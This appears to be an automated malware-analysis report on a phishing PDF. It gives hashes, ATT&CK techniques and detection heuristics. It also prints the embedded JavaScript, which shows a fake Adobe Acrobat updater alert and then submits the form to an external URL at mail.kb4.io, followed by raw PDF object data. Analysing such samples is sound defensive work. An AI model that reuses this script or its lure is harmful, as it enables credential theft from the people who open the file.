PDF malware analysis — malicious · 27138f40d6180669

MALICIOUS

PDF

107.3 KB Created: 2018-06-12 09:41:10 -04:00 First seen: 2021-07-10

MD5: cba15b99d998e0069717f51b4d2db4af SHA-1: d0eafc2b9bb87015c0a26d68220c8f0e40611f1d SHA-256: 27138f40d61806693bbf9d9ed9fa53de9d1de14522a47d349f238b1beaa35f2f

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment T1041 Exfiltration Over C2 Channel

The sample is a PDF document that contains embedded JavaScript. This script is designed to display a fake 'Adobe Acrobat Updater' alert to the user, luring them into a false sense of security. Subsequently, it executes a form submission to a remote URL, which is a common technique for credential harvesting. The presence of multiple heuristics related to JavaScript execution and form submission, along with the specific lure, strongly indicates a phishing or credential theft attempt.

Machine Learning

Nyx PDF Classifier malicious score 0.9477

Heuristics 8

PDF auto-runs JavaScript form submission on open critical PDF_OPENACTION_JS_SUBMITFORM

PDF uses /OpenAction to run JavaScript that calls submitForm() with an external HTTP(S) URL. Opening the document triggers the outbound submission path without requiring a normal link click.
PDF JavaScript shows fake Acrobat updater prompt high PDF_FAKE_ACROBAT_UPDATE_LURE

PDF JavaScript displays Acrobat/update-themed language such as a document rendering engine update or remote connection to Adobe servers. When paired with JavaScript or external submission, this is a social-engineering lure rather than benign document text.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON

Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
External URI info PDF_URI

PDF contains an external URL action
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://mail.kb4.io/XYVVaNE1WVm9WaTl5WlVSQk1GRmFiWHBCVEZoMVQxZDBhbVZRU1hsYVdFUkRiWGxrTlZKcVpqRTRaSFZ0Vkdrd1NEZzRWVWhUZFdWNVFrbGFaVFl6TVdSa2MybFpkRXRMWTBKR2VDdFJkbkJEWm5CcWMzWmxjRFJVTDNrMFNDOUNTMlJtVVdrclpXWmtPRUU5TFMxVFpsQlhLM1JqVWxSV2RYYzFhbEZyTkZWQlUxQjNQVDA9LS1mNTFkYjIyZTFjZjQ3NjQ5YmI0YzI3YzE0MTQ5NWVkOWUxZmRjYjdh?cid=895413470#FDF Referenced by PDF JavaScript
- https://mail.kb4.io/XVjFCdlRTODRhMmhzYXpoSlJIaHZha0l3V0dnclZVaHJRVE1yU0dKVVNFeEtaRGhSWmxCR2F6UkpVVUZ1Tkc5eFkzUjNVV05HTms1T1dVVm1VbUZvVEdkRWFHdG5SalZSUTJkeFpGWjFMMnh3YzJacFIyTXhSSFJuT1c5SlRTc3JNbGhIVTNjNFUzZHFURkZ4Tnl0aFZWUTROM0pqZG5neVV6RkRUR0ZTWjJkeFIxWnVPVk5qYkRkcFoxWXZiblZKTWk5TU16Z3JaVzFzT0V3dlYyWk5ka0ZGVUU0MWNVUmtaV1J2UFMwdFUxaHpja013T1VKT1MxTlRPV1kwSzFOcFdFazNkejA5LS1iYzJlZTY3OWM1ODhjNDZjYTMzMTdhOTYxMzVkMTZjMzBkNzNiZDdm?cid=895413470Referenced by PDF JavaScript
- https://mail.kb4.io/XTjNvNFpWUktSVTF2VWk5Rk5ITjVMelIzWkVGbldUWjZTVXBZYm5kbFRXbG5WWEJ1V1hweFUxUkJTVzVXWmpaMlFVRXlURmRwZDAxVkwzbHNlalpLTUZOSU1GQktWRVZaYmpGc2NFOUhZbVk0VEVoWFZXSlpPSFJuTVRCTFdsQXhVRk40Ukc5aGREbGxXSHB1VEhRMGNFaFpUVFpYWmpFMGMxSjBiMDFyYUN0RGR6ZEJjMjQ0VVhjeVdrMDJWbUV5TjJobFZubE1Va1Z2U1VoR1luSnFWRGRvU1RReFowVkhkVTVOUFMwdFRFUXpXSGczYzNwVVFrcFZkRkZwVEZaSGNuUnFaejA5LS0zZDhlOWVhYTgwODIxMzYyNTE5Yzc2ZTQ0NjcxMzZlMmJjOTkwMjRj?cid=895413470Referenced by PDF JavaScript
- https://mail.kb4.io/XZFhOWmFtVXZXa1J3YlZseFUxaExNbmxHYldreFNuYzNhbU13UW0xeFpDc3hWRmRCVlZZMVYzVTJWRkpOYjJvNFNXOVphbHBrTmpCUFVpOURjR3BHYUVwMlYwY3daR2h5UmxkVlFubG1TQ3M0YWpKWFlWSmxPRkZzUVhwdFFXTjFUekJDWVZkMU1HY3pWSEpuV0hOalZVeEJMM1ptV1hoV01IWXlWMnhsTkZWSFRucFFPVXc1WjJkTlV6WTBPR0Z4ZVdsSWNFeGxRVXR4WVZkNFZrSkRha1ZsWlU5T05tbEphM2RCUFMwdFVqTjZWamxyTUZWWE9UZzNOVzExVmtSeE4zVTNkejA5LS04ZmU5NDVjMzVhZDVjMDgwODBhYTZhOTQzZmE2OTgyN2IxM2IwN2Jh?cid=895413470Referenced by PDF JavaScript
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by PDF JavaScript
- http://ns.adobe.com/xap/1.0/Referenced by PDF JavaScript
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/tiff/1.0/Referenced by PDF JavaScript
- http://ns.adobe.com/exif/1.0/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0012_000.js`	pdf-javascript-stream	PDF /JS object 12 at offset 0x180A	589 bytes
SHA-256: `ab2bbaa396697ed8aaf97c55e2b8e7a88063611aa14000801979bcde51c299a6`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function docOpened() { app.alert({cMsg: 'We need to update your document rendering engine. Click OK to continue, when prompted allow remote connection to Adobe servers.', cTitle: 'Adobe Acrobat Updater',nIcon: 3}); app.doc.submitForm('https://mail.kb4.io/XYVVaNE1WVm9WaTl5WlVSQk1GRmFiWHBCVEZoMVQxZDBhbVZRU1hsYVdFUkRiWGxrTlZKcVpqRTRaSFZ0Vkdrd1NEZzRWVWhUZFdWNVFrbGFaVFl6TVdSa2MybFpkRXRMWTBKR2VDdFJkbkJEWm5CcWMzWmxjRFJVTDNrMFNDOUNTMlJtVVdrclpXWmtPRUU5TFMxVFpsQlhLM1JqVWxSV2RYYzFhbEZyTkZWQlUxQjNQVDA9LS1mNTFkYjIyZTFjZjQ3NjQ5YmI0YzI3YzE0MTQ5NWVkOWUxZmRjYjdh?cid=895413470#FDF'); } docOpened();
`javascript_obj0012_001.js`	pdf-javascript-stream	PDF /JS object 12 at offset 0x1831	103678 bytes
SHA-256: `8e52b5e2a3a6bf7bf8d69991d453f61cb5e491a09969c51fd3c27b58b4427155`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 8 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function docOpened() { app.alert({cMsg: 'We need to update your document rendering engine. Click OK to continue, when prompted allow remote connection to Adobe servers.', cTitle: 'Adobe Acrobat Updater',nIcon: 3}); app.doc.submitForm('https://mail.kb4.io/XYVVaNE1WVm9WaTl5WlVSQk1GRmFiWHBCVEZoMVQxZDBhbVZRU1hsYVdFUkRiWGxrTlZKcVpqRTRaSFZ0Vkdrd1NEZzRWVWhUZFdWNVFrbGFaVFl6TVdSa2MybFpkRXRMWTBKR2VDdFJkbkJEWm5CcWMzWmxjRFJVTDNrMFNDOUNTMlJtVVdrclpXWmtPRUU5TFMxVFpsQlhLM1JqVWxSV2RYYzFhbEZyTkZWQlUxQjNQVDA9LS1mNTFkYjIyZTFjZjQ3NjQ5YmI0YzI3YzE0MTQ5NWVkOWUxZmRjYjdh?cid=895413470#FDF'); } docOpened(); endstream endobj %QDF: ignore_newline 13 0 obj 483 endobj %% Page 1 %% Original object ID: 16 0 14 0 obj << /Annots 15 0 R /Contents 16 0 R /CropBox [ 0 0 612 792 ] /MediaBox [ 0 0 612 792 ] /Parent 8 0 R /Resources << /Font << /C0_0 18 0 R /C0_1 19 0 R /C0_2 20 0 R >> /ProcSet [ /PDF /Text /ImageC ] /XObject << /Im0 21 0 R /Im1 23 0 R /Im2 25 0 R >> >> /Rotate 0 /Type /Page >> endobj %% Original object ID: 32 0 15 0 obj [ 27 0 R 28 0 R 29 0 R ] endobj %% Contents for page 1 %% Original object ID: 18 0 16 0 obj << /Length 17 0 R >> stream q 404.8937073 0 0 269.9337463 107.3061676 460.5401001 cm /Im0 Do Q BT /C0_0 12 Tf 1 0 0.2679 1 116.07 441.387 Tm <00350049004a005400010045005000440056004e0046004f00550001004a005400010046004f00440053005a0051005500460045000100560054004a004f0048000100220045005000430046000100340046004400560053004600010024004d005000560045>Tj /C0_1 12 Tf <00e4>Tj /C0_0 12 Tf <000f0001>Tj 4.179 -15.6 Td <0024004d004a0044004c000100430046004d005000580001005500500001005400460044005600530046004d005a00010057004a00460058000100440050004f00550046004f00550054000f0001>Tj ET /TouchUp_TextEdit MP BT 0 i /C0_2 10 Tf 158.323 52.725 Td <0031004d00460042005400460001004f005000550046001b000100340050004e00460001005800460043004e0042004a004d00010044004d004a0046004f0055005400010042005300460001004f00500055000100440050004e005100420055004a0043004d004600010058004a005500490001002200450050004300460001>Tj 0 -12 TD <00340046004400560053004600010024004d00500056004500e4000f0001002a004700010055004900420055000100490042005100510046004f0054000d0001004500500058004f004d005000420045000100550049004600010047004a004d004600010042004f00450001005000510046004f00010050004f0001>Tj T* <002500460054004c005500500051000f>Tj ET q 56.1389923 0 0 43.9851837 94.3450775 23.5263672 cm /Im1 Do Q q 157.0927124 0 0 36.2528992 230.401001 342.7270813 cm /Im2 Do Q endstream endobj 17 0 obj 1300 endobj %% Original object ID: 40 0 18 0 obj << /BaseFont /KUFUSM+HiraKakuProN-W6 /DescendantFonts 30 0 R /Encoding /Identity-H /Subtype /Type0 /ToUnicode 31 0 R /Type /Font >> endobj %% Original object ID: 42 0 19 0 obj << /BaseFont /VGWIQQ+HiraKakuProN-W6 /DescendantFonts 33 0 R /Encoding /Identity-H /Subtype /Type0 /ToUnicode 34 0 R /Type /Font >> endobj %% Original object ID: 44 0 20 0 obj << /BaseFont /JSIEEO+HiraKakuProN-W6 /DescendantFonts 36 0 R /Encoding /Identity-H /Subtype /Type0 /ToUnicode 37 0 R /Type /Font >> endobj %% Original object ID: 25 0 21 0 obj << /BitsPerComponent 8 /ColorSpace /DeviceRGB /Filter /DCTDecode /Height 400 /Metadata 39 0 R /Name /X /Subtype /Image /Type /XObject /Width 600 /Length 22 0 R >> stream �� JFIF �� JFIF �� C &""&0-0>>T�� C &""&0-0>>T�� X " �� } !1A Qa "q 2�� #B�� R��$3br� %&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�� w !1 AQ aq "2� B�� #3R� br� $4�%� &'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�� ? ��sKL� ^��h� R� ( Դ�p4 �g Q@ ��(��` ... (truncated)
`font_00_cff_off00019623.bin`	pdf-font-stream	PDF embedded font (cff) at offset 0x19623	4575 bytes
SHA-256: `9340d372ad75a105fdb1627a30e96f892e0dc7d9588c0150cf06b4fa72281cc0`

Open this report in the interactive analyzer, or submit your own file for analysis.